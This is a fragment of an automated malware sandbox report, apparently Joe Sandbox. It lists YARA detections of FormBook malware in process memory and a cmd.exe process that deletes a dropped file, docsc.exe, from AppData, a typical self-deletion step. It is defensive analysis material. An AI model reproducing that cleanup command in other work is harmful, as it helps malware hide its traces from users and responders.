                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 2468 Parent PID: 660

                                              General

                                              Start time:11:34:12
                                              Start date:12/05/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\docsc.exe'
                                              Imagebase:0x4a870000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >